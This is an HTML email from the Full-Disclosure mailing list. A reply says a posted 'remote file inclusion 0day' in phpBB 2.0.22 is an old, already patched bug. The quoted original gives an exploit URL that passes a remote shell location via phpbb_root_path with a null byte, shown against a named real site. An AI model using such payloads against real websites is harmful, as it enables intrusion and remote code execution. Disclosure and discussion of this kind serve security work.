<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">
<META NAME="GENERATOR" CONTENT="GtkHTML/3.14.1">
</HEAD>
<BODY>
AFAIK this is a very old bug and has been fixed in all modules?<BR>
I've tested your vuln against a few installs of phpBB and can't reproduce it... so seems it's been patched already?<BR>
<BR>
<A HREF="http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html">http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html</A><BR>
<BR>
Regards,<BR>
Jeroen<BR>
<BR>
-------- --------<BR>
<B>From</B>: <A HREF="mailto:dr.rezen@gmail.com">dr.rezen@gmail.com</A><BR>
<B>To</B>: <A HREF="mailto:full-disclosure@lists.grok.org.uk">full-disclosure@lists.grok.org.uk</A><BR>
<B>Subject</B>: [Full-disclosure] 0DAY RFI in phpBB &lt;= 2.0.22 HOT<BR>
<B>Date</B>: Fri, 01 Jun 2007 13:05:01 -0400<BR>
<BR>
<PRE>
New bug found in phpBB, most pages vulnerable, there's more bugs, I'll post one a week:
victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
For example:
<A HREF="http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00">http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00</A>
Enjoy :)
BUG BY REZEN! XORCREW! H4X H4X!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: <A HREF="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</A>
Hosted and sponsored by Secunia - <A HREF="http://secunia.com/">http://secunia.com/</A>
</PRE>
</BODY>
</HTML>